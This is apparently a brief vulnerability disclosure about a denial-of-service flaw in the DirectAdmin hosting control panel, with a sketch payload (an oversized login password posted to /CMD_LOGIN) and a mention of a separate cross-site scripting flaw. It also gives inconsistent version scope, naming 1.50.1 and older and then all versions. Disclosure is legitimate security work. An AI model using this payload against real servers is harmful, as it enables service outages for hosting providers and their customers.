Iranian security researcher and IEDB Team member/IEDB/IrIsT.ir and Xssed.ir founder Amir has published a DoS vulnerability in the Directadmin ControlPanel software -http://www.directadmin.com- Directadmin is a web hosting control panel for the remote web-based administration of multiple web servers.
The vulnerability affects Directadmin ControlPanel version 1.50.1 and older. In this vulnerability, an attacker can input an unlimited length password in the password field of the DirectAdmin login screen -there is no limit on the number of characters entered- which causes DirectAdmin to crash. This problem is present in all versions of DirectAdmin.
An attacker could write a script to attack DDoS based on the following information :
POST /CMD_LOGIN HTTP/1.1
$POC = A * 10000
Links to details :
Amir has also published recently a cross-site scripting vulnerability for Directadmin ControlPanel which enables an attacker to suspend or unsuspend users.
Links to details:
Amir credits thanks to all of the following :
- Bl4ck M4n
- Ramin Assadian
- Ramin Asadyan
- Moslem Haghighian
- And all my friends And All Member In Iedb.Ir Team
Websites & contacts :